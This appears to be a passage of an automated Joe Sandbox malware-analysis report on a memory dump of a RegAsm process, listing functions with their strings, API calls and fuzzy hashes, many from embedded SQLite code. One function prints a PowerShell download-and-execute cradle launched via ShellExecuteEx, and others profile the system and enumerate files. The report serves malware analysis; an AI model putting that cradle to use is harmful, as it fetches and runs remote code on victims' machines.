Instruction Fuzzy Hash: 08B1C4B4A007419FF720AF24D845B9777E4BF4471AF44892CE88A87341E77AF4498BB2

Function 1B461710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

%z%s%Q, xrefs: 1B46180D
%z, %Q HIDDEN, %s HIDDEN), xrefs: 1B461831
rank, xrefs: 1B461824
CREATE TABLE x(, xrefs: 1B4617D9

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: 49a4448263db63f0e71ad1ba3d1555b008ef32ce615251333f31952f0260e48f
Instruction ID: 00dc5032ccc0074143e536e0b0f11e458ddc255b0f86cce87cd289ab62503e09
Opcode Fuzzy Hash: 49a4448263db63f0e71ad1ba3d1555b008ef32ce615251333f31952f0260e48f
Instruction Fuzzy Hash: 4C81C3B2A002119FDB018F65DC84B9AB7F8FF94395F44462EFC84A7210D735D958CB92

Function 1B4D74A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D74CD
%s at line %d of [%.10s], xrefs: 1B4D74DC
misuse, xrefs: 1B4D74D7
unable to close due to unfinalized statements or unfinished backups, xrefs: 1B4D75D1
invalid, xrefs: 1B4D74BC
API call with %s database connection pointer, xrefs: 1B4D74C1

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: 2a29776f85ecc3e8a98dfd25efffbf6aa34a88dfad43d5794154acfa3e309d5e
Instruction ID: cf8a6a8fd61ff35e41cfa74d8fa39eff5b18dc5fa646b27ce6251e0132500cef
Opcode Fuzzy Hash: 2a29776f85ecc3e8a98dfd25efffbf6aa34a88dfad43d5794154acfa3e309d5e
Instruction Fuzzy Hash: EE515775900791ABE711DF38ECA5BDB73A8AFA0215F05801DE8AA93701E730F955C6A3

Function 1B47BCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

undersize RTree blobs in "%q_node", xrefs: 1B47BDA1
PRAGMA %Q.page_size, xrefs: 1B47BD03
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1B47BD67

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: 53c7f28313fbc026f10493cfde01a4285411aef7f8856e20d10caeeabe898f87
Instruction ID: 2a588b7f6c5bbe9097c6c2c5ba79e127408ddb5ee53c7f298ac5615f060b314d
Opcode Fuzzy Hash: 53c7f28313fbc026f10493cfde01a4285411aef7f8856e20d10caeeabe898f87
Instruction Fuzzy Hash: 9731D2B2900211ABD704AF64CC94BD6B7ACEF94256F04862AFE45D6301D736ED68CBE1

Function 00411049 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 0041105E
GetDeviceCaps.GDI32(00000000,00000008), ref: 00411069
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00411074
ReleaseDC.USER32(00000000,00000000), ref: 0041107F
GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00415FA1,?,00000000,?,Display Resolution: ,00000000,?,00427804,00000000,?), ref: 0041108B
HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00415FA1,?,00000000,?,Display Resolution: ,00000000,?,00427804,00000000,?,00000000), ref: 00411092
wsprintfA.USER32 ref: 004110A4

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Strings

%dx%d, xrefs: 0041109E

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: dcf4629ba986e26570fc2f9d60c2802974ef96b0427a185b29fea47a7d42d4be
Instruction ID: 94032e801da04b5655d9d6f1e2ac6fa5aad14b6f4fc538720d234ea35a864c04
Opcode Fuzzy Hash: dcf4629ba986e26570fc2f9d60c2802974ef96b0427a185b29fea47a7d42d4be
Instruction Fuzzy Hash: 5CF0A479A01224BFD7205BA5DC4DDDF7E7DEF4BBA6B001015FB0597150CA744981CBA4

Function 1B4D32F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D36B8, 1B4D36FD, 1B4D375D, 1B4D380E
%s at line %d of [%.10s], xrefs: 1B4D36C7, 1B4D370C, 1B4D376C, 1B4D381D
database corruption, xrefs: 1B4D36C2, 1B4D3707, 1B4D3767, 1B4D3818

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 5c25e6faba967f11175802cc72f906bc5ba780f2650a42ce805372de78257688
Instruction ID: 6eef5cbe88e3e2a864435a98f704cca4a62af8268e50ac9634a71a55a9a395b1
Opcode Fuzzy Hash: 5c25e6faba967f11175802cc72f906bc5ba780f2650a42ce805372de78257688
Instruction Fuzzy Hash: E1F14575A047519FD700DF28C8D0BE6BBE4FFA4215F888199E8848B352E335F95AC7A1

Function 1B4028E5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON

Download Yara Rule

Strings

unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 1B402AA0
malformed inverted index for FTS5 table %s.%s, xrefs: 1B402A8A
INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B4029F1

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
API String ID: 0-3572959941
Opcode ID: d76baad33b229b5d98e0aef82322fceb35f4a27c07c284a479ce9f138cd1d8f4
Instruction ID: e838235aefad2839f6c4f5f2df5a5cde90c23921f302383cae12c815bffd1dc7
Opcode Fuzzy Hash: d76baad33b229b5d98e0aef82322fceb35f4a27c07c284a479ce9f138cd1d8f4
Instruction Fuzzy Hash: 8441F6B2901221AFD714CF69DC88ED777ACFF94256F44422EF84582240DB31D698CBE2

Function 1B3E9700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 1B3E98D3

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: 8ec8e96faf98fa90676123d41993962b678c4ef413e61f964846b55a431e1779
Instruction ID: 189ca1f48ba4a4ed79e7a2b9c16d5eb6705147154b8fc5c3dd7d4d62f8017599
Opcode Fuzzy Hash: 8ec8e96faf98fa90676123d41993962b678c4ef413e61f964846b55a431e1779
Instruction Fuzzy Hash: 9981C5BB7052109FEB109F18EC40B96F3A1FB85235F20476FE546976A1E732E524DB60

Function 1B3FEB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B3FECCB
%s at line %d of [%.10s], xrefs: 1B3FECDA
database corruption, xrefs: 1B3FECD5
%.*s%s, xrefs: 1B3FEC88

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-894757972
Opcode ID: 407f516cae181baec4e171c6262257dac7e0a8d946fff9a8cbcd84f8a91502fe
Instruction ID: c6734b3a45136008a687c37563a06d556873f4ae3278cd6513a66975d383b048
Opcode Fuzzy Hash: 407f516cae181baec4e171c6262257dac7e0a8d946fff9a8cbcd84f8a91502fe
Instruction Fuzzy Hash: B7610375A043618FDB14CF24C881AEBB7E5AF84B14F044A6DF8999B350D731ED15CBA2

Function 0041222E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412233

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

ShellExecuteEx.SHELL32(?), ref: 004123F7

Strings

.ps1, xrefs: 004122E6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412379
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412310
')", xrefs: 00412334
C:\ProgramData\, xrefs: 00412275

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 416170631-1989157005
Opcode ID: 83b0181d60c87516bf381c34d1c63ee4243d15cfd901c24dfdae67c707c003eb
Instruction ID: 8e491ba107275d6ffd48a0e81930a77ab253060bd689dfdf6e88d6676e09363d
Opcode Fuzzy Hash: 83b0181d60c87516bf381c34d1c63ee4243d15cfd901c24dfdae67c707c003eb
Instruction Fuzzy Hash: E0614371C05248EEDB15EBE5C555BDDBBB8AF24304F50409EE40563182DFB81BC9CB65

Function 1B3D9DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g],, xrefs: 1B3D9E7E
[%!g,%!g]], xrefs: 1B3D9EC0

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 8347cef21f86a0d215fd300f32d5936f32b4c83c5d5ea181e4c2d5be763d716f
Instruction ID: f0e78790a44f76c74428e2d68f00f994252a5866bd1b762dbcbdc7d018481cc6
Opcode Fuzzy Hash: 8347cef21f86a0d215fd300f32d5936f32b4c83c5d5ea181e4c2d5be763d716f
Instruction Fuzzy Hash: E45113729007019BD700DF69CCC5B97B7B9AF86301F80472DF8499A241E771E5A9CBA2

Function 1B3FF330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1B3FF418
INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B3FF33F
malformed inverted index for FTS%d table %s.%s, xrefs: 1B3FF3F3

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: 7b34015e3eb3b48886f0e39e0eba481a4c06db661a7323ec5a0d49e5a9e6b183
Instruction ID: d9b8357abef400f7633a871a7281083754799c70d8bfd0ccbb4591f32b000e5f
Opcode Fuzzy Hash: 7b34015e3eb3b48886f0e39e0eba481a4c06db661a7323ec5a0d49e5a9e6b183
Instruction Fuzzy Hash: EB41C2B29022219BE714EF259C89ADB776CEF90256F48462EFC46C2100D731D669CBE2

Function 1B3F30F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2adc46644af7b16046e176bb026018361b8c97df8a1c1bbc49f4d83411d5cefb
Instruction ID: 82efb902a485360d9218bd875caca727df4e5cc30e034df6f29ba9b0c14e1e92
Opcode Fuzzy Hash: 2adc46644af7b16046e176bb026018361b8c97df8a1c1bbc49f4d83411d5cefb
Instruction Fuzzy Hash: C6517476608200BFDB40EB64FC45EDB7BE2AF85320F0985A8F158871B5E231DD619B42

Function 0041740F Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417414
lstrcat.KERNEL32(?,?), ref: 0041746A

Part of subcall function 004119CA: SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

lstrcat.KERNEL32(?,00000000), ref: 00417490
lstrcat.KERNEL32(?,?), ref: 004174B0
lstrcat.KERNEL32(?,?), ref: 004174C4
lstrcat.KERNEL32(?), ref: 004174D7
lstrcat.KERNEL32(?,?), ref: 004174EB
lstrcat.KERNEL32(?), ref: 004174FE

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00411986: _EH_prolog.MSVCRT ref: 0041198B
Part of subcall function 00411986: GetFileAttributesA.KERNEL32(00000000,?,0040C604,?,00426CD2,?,?), ref: 0041199F

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00417148: _EH_prolog.MSVCRT ref: 0041714D
Part of subcall function 00417148: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00417165
Part of subcall function 00417148: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 0041716C
Part of subcall function 00417148: wsprintfA.USER32 ref: 00417184
Part of subcall function 00417148: FindFirstFileA.KERNEL32(?,?), ref: 0041719B
Part of subcall function 00417148: StrCmpCA.SHLWAPI(?,004279C0), ref: 004171B8
Part of subcall function 00417148: StrCmpCA.SHLWAPI(?,004279C4), ref: 004171D2
Part of subcall function 00417148: wsprintfA.USER32 ref: 004171F6

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
